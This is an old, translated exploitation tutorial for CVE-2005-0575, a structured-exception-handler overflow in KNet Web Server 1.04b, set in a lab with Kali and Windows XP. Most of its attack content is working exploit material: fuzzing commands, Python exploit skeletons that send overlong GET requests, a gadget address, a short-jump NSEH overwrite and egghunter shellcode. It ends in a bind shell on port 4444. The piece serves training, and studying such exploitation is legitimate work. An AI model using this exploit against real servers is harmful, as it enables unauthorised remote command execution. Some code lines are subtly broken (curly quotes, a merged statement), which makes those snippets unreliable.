Written by : Antonius (w1sdom)
Web : www.bluedragonsec.com
Github : https://github.com/bluedragonsecurity
This is a very old write-up about CVE-2005-0575 Remote Exploitation, this is very old and might not be relevant anymore ! you have been warned ! I forgot when I made it. This is translated from Indonesian language (as always).
This section discusses exploitation techniques on a vulnerable application that uses the Structured Exception Handling (SEH) mechanism. Training participants will be given an example vulnerable application that uses SEH for exploitation practice.
Attacker machine: x86 Kali Linux — IP: 10.200.0.5
Target machine: x86 Windows XP SP3 — IP: 10.200.0.120
SEH is a mechanism that provides exception handling when an error occurs during application runtime. The SEH implementation is a stack-based linked list. This mechanism can be provided either by the operating system or by the application's source code.
The mechanism is essentially straightforward:
Before the SEH prolog: the stack contains the size of the local variables needed by the caller → Stack: {8}
After calling the prolog: the caller's return address is pushed onto the stack → Stack: {8, RetAddr}
When an exception occurs, SEH will be located at ESP+8. To transition from SEH to NSEH we can use a ROP gadget such as: POP r32 → POP r32 → RET (pop 4 bytes from stack, pop another 4 bytes, then ret).
After successfully escaping from SEH we land at NSEH, where we only have 4 bytes of buffer we control. At this point we can use a short jump, e.g.: EB D0.
To discover the bug in KNet Web Server 1.04b we will perform fuzzing using the Spike fuzzer. On the Kali Linux machine, create the following Spike template:

x
Next, attach KNet to OllyDbg and run fuzzing with Spike. Launch the fuzzer from the Kali Linux machine:

generic_send_tcp 10.200.0.120 80 httpd.spk 0 0
The fuzzing result using the httpd.spk template above will cause a crash in KNet, where we can observe that the variable being tested is the length of the filename in an HTTP GET request. On the Windows machine we can see that KNet has crashed and the SE Handler has been successfully overwritten with 0x41414141.

OllyDbg showing KNet crash with SE Handler overwritten by 0x41414141
To determine how many bytes are needed before the SEH handler is overwritten, we will use pattern_create.rb. Generate a 1300-byte pattern:
/usr/share/metasploit-framework/tools/pattern_create.rb 1300

Generating a Metasploit pattern with pattern_create.rb
Insert the pattern into the first basic exploit skeleton:
import socket
sploit="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu"
buffer="GET /" + sploit + " HTTP/1.1\r\n"
buffer+="Host: 10.200.0.120\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/5.0\r\n"
buffer+="Content-Length: 1048580\r\n\r\n"
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("10.200.0.120", 80))
s.send(buffer) s.close()
Re-attach KNet to OllyDbg, run the exploit above, and at the time of the crash observe that SEH has been overwritten with the bytes 6f42336f.

OllyDbg SEH chain showing SE handler overwritten with 6F42336F
Find the offset of those four bytes using pattern_offset.rb:
/usr/share/metasploit-framework/tools/pattern_offset.rb 6f42336f
# Output: [*] Exact match at offset 1210
NOTE: Based on the pattern_offset.rb result, SEH will be overwritten after 1210 bytes.
Verify with the second exploit skeleton:
import socket
seh = "\x43\x42\x41\x40"
sploit = "\x90" * 1210 + seh
buffer="GET /" + sploit + " HTTP/1.1\r\n"
buffer+="Host: 10.200.0.120\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/5.0\r\n"
buffer+="Content-Length: 1048580\r\n\r\n"
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("10.200.0.120", 80))
s.send(buffer)
s.close()
Re-attach KNet to OllyDbg and confirm that the SEH handler has been overwritten with 0x40414243.
After overwriting the SEH handler, the next step is to redirect execution from SEH to NSEH. Many different payloads can be used here; we will use the most popular approach — the POP POP RET instruction sequence.
To locate a usable POP POP RET sequence, we use the SafeSEH module scanner plugin in OllyDbg.

SafeSEH Module Scanner results in OllyDbg
From the scan results we can see that a POP POP RET sequence within KNet.exe itself is available for use. Search for it using OllyDbg's "Find sequence of commands" feature:

Finding POP POP RET sequence in KNet.exe using OllyDbg
The POP POP RET sequence is found inside KNet.exe at memory address 0x004016E1.

Craft the exploit skeleton using this address:
import socket
seh = “\xe1\x16\x40”
sploit = “\x90” * 1210 + seh
buffer = “GET /” + sploit + “ HTTP/1.1\r\n”
buffer += “Host: 10.200.0.120\r\n”
buffer += “Content-Type: application/x-www-form-urlencoded\r\n”
buffer += “User-Agent: Mozilla/5.0\r\n”
buffer += “Content-Length: 1048580\r\n\r\n”
print len(sploit)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((“10.200.0.120”, 80))
s.send(buffer)
s.close()
Re-attach KNet with OllyDbg and set a breakpoint at 0x004016E1, then run the exploit. When the crash occurs, press Shift+F9 and execution will be redirected to our POP POP RET gadget at 0x004016E1.

Execution redirected to POP POP RET gadget at 0x004016E1
Press F7 to step through until we reach NSEH.

NSEH reached — we control the 4-byte buffer at NSEH
We can confirm that we now control a 4-byte buffer at NSEH.
Once we land at NSEH, we need a second-stage payload. Here we will use the short jump EB D0 to jump backward into a few dozen bytes of buffer we control, where we will place the EggHunter shellcode.
The EggHunter is a small shellcode typically used when the currently controlled buffer is not large enough to host a full-sized shellcode. It scans process memory for a unique marker (tag) that is placed directly before the real shellcode. Once the marker is found, execution is redirected to that memory address and the real shellcode runs.
import socket
seh = “\xe1\x16\x40”
nseh = “\xeb\xd0\x90\x90”
sploit = “\x90” * 1206 + nseh + seh
buffer = “GET /” + sploit + “ HTTP/1.1\r\n”
buffer += “Host: 10.200.0.120\r\n”
buffer += “Content-Type: application/x-www-form-urlencoded\r\n”
buffer += “User-Agent: Mozilla/5.0\r\n”
buffer += “Content-Length: 1048580\r\n\r\n”
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((“10.200.0.120”, 80))
s.send(buffer)
s.close()
Set a breakpoint at 0x004016E1, run the exploit, press Shift+F9 on the crash, and step with F7. When execution reaches Stage 2, the EB D0 short jump redirects us into the NOP sled / EggHunter area we control.

EB D0 short jump redirecting into the NOP sled / EggHunter area
We use the 32-byte EggHunter from 0xff (Exploit-DB ID 16283) with the marker w00t:
# 32-byte EggHunter shellcode (NtAccessCheckAndAuditAlarm syscall method)
egghunter = (“\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7”)
NOTE: The marker T00W (ASCII for w00t prefixed twice) must be placed immediately before the real shellcode so the EggHunter can locate it in memory.
Total buffer before SEH overwrite: 1213 bytes (3-byte SEH overwrite). The layout is:

https://github.com/bluedragonsecurity/exploits/tree/main/CVE-2005-0575-EXPLOIT
Restart KNet Web Server on the Windows machine, then run the final exploit from Kali Linux:

KNet Web Server running on Windows XP SP3 target
A bind shell on port 4444 has been successfully obtained on the target Windows XP SP3 machine. We now have full command-line access from the Kali Linux attacker machine via Telnet.

Bind shell obtained — full command-line access on the target via Telnet
I am Chinese based in Indonesia. I do low level vulnerability research & hardware hacking (main focus : robotics).
Hobbies